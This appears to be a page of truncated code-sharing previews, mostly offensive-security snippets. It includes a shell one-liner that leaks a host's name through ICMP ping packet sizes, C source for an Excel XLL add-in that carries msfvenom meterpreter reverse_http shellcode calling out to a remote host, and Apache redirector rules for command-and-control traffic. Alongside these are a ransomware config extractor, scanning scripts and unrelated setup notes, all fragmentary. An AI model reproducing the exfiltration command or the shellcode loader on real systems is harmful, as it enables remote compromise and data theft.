| import subprocess | |
| import argparse | |
| import re | |
| import sys | |
| import requests | |
| def do_dig(domain): | |
| command = "dig {} | grep IN".format(domain) | |
| try: | |
| output = subprocess.check_output(command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT) |
tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap
ip=vm03;output=`hostname`;for ((i=0;i<${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done
| // Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll | |
| #include <Windows.h> | |
| __declspec(dllexport) void __cdecl xlAutoOpen(void); | |
| DWORD WINAPI ThreadFunction(LPVOID lpParameter) | |
| { | |
| // Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c" | |
| unsigned char b[] = | |
| "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" |
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| # Save this file into something like /etc/apache2/redirect.rules. | |
| # Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
| # | |
| # Include /etc/apache2/redirect.rules | |
| # |
| """ | |
| Extract GlobeImposter 2.0 Ransomware Config | |
| Author: @demonslay335 | |
| """ | |
| import os | |
| import sys | |
| import binascii | |
| import re | |
| import hashlib |
This script downloads and builds OpenSSL v1.0.2m and socat v1.7.3.2 in /usr/local/src. Once complete, a symlink at /usr/local/bin/socat-ssl23 is created so that you can run it with socat-ssl23.
Tested on Kali Linux:
This document covers how to setup netboot.xyz, a service that provides iPXE-based installation and live boot of a bunch of operating systems, on a Ubiquiti EdgeRouter.
I've made a few assumptions throughout this document that will probably be different for your setup:
| @ECHO off | |
| @setlocal EnableDelayedExpansion | |
| @goto label1 | |
| @echo this lines should not be printed | |
| @echo and this whole block (lines 4-8) can actually be removed | |
| @echo I added these just for Charlie22911 | |
| @:label1 | |
| @set LF=^ |
| #!/bin/bash | |
| #Script to Scan All Sites Found With A Simple NMAP Scan With Burp. | |
| sites=$(nmap "$1" --open 443 --resolve-all --open -oG - | awk 'NR!=1 && /open/{print $2}') | |
| for site in $sites | |
| do | |
| curl -vgw "\\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}' > /dev/null 2>&1 | |
| printf "Scanning %s with burp.\\n" "$site" | |
| done |
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
